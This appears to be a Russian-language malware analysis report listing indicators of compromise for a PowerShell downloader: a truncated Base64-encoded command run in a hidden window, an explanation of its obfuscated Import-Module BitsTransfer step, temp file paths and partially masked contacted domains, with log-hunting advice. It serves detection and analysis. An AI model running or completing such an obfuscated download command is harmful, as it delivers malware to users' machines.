Техническая информация
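- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACcASQBtAHAAJwArACcAbwAnACsAJwByAHQALQAnACsAJwBNACcAKwAnAG8AZAB1AGwAZQAnACkAIABCAEkAdABzAFQAUgBBAG4AcwBGAGUAUgA7ACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQA9ACcAaAB0AH...
  (Пояснение: `-e` — сокращение параметра `-EncodedCommand`; его значение — команда в Base64 поверх UTF-16LE, на странице строка обрезана. Видимая часть декодируется как `.('Imp'+'o'+'rt-'+'M'+'odule') BItsTRAnsFeR;$gaivyoggiekdojxaumloam='ht`: имя `Import-Module` собрано конкатенацией строк, загружается модуль BitsTransfer, затем начинается строковое значение на «ht» — вероятно, URL. При разборе журналов стоит искать и декодированный текст, а не только Base64; при включённом Script Block Logging (событие 4104) он записывается уже в декодированном виде.)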
- %WINDIR%\temp\cabd252.tmp
- %WINDIR%\temp\tard253.tmp
- %WINDIR%\temp\cabd283.tmp
- %WINDIR%\temp\tard284.tmp
- %WINDIR%\temp\cabe8db.tmp
- %WINDIR%\temp\tare8dc.tmp
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\temp\cabd252.tmp
- %WINDIR%\temp\tard253.tmp
- %WINDIR%\temp\cabd283.tmp
- %WINDIR%\temp\tard284.tmp
- %WINDIR%\temp\cabe8db.tmp
- %WINDIR%\temp\tare8dc.tmp
- 'sh####nfoways.com':80
- 'te###.cxyw.net':80
- 'su########eandorganicgarments.com':80
- 'p3###########.shr.prod.phx3.secureserver.net':80
- 'st####g.icuskin.com':80
- 'ra####kaonline.com':443
- DNS ASK ra####kaonline.com
- DNS ASK sh####nfoways.com
- DNS ASK te###.cxyw.net
- DNS ASK su########eandorganicgarments.com
- DNS ASK p3###########.shr.prod.phx3.secureserver.net
- DNS ASK st####g.icuskin.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACcASQBtAHAAJwArACcAbwAnACsAJwByAHQALQAnACsAJwBNACcAKwAnAG8AZAB1AGwAZQAnACkAIABCAEkAdABzAFQAUgBBAG4AcwBGAGUAUgA7ACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQA9ACcAaAB0AH...' (со скрытым окном)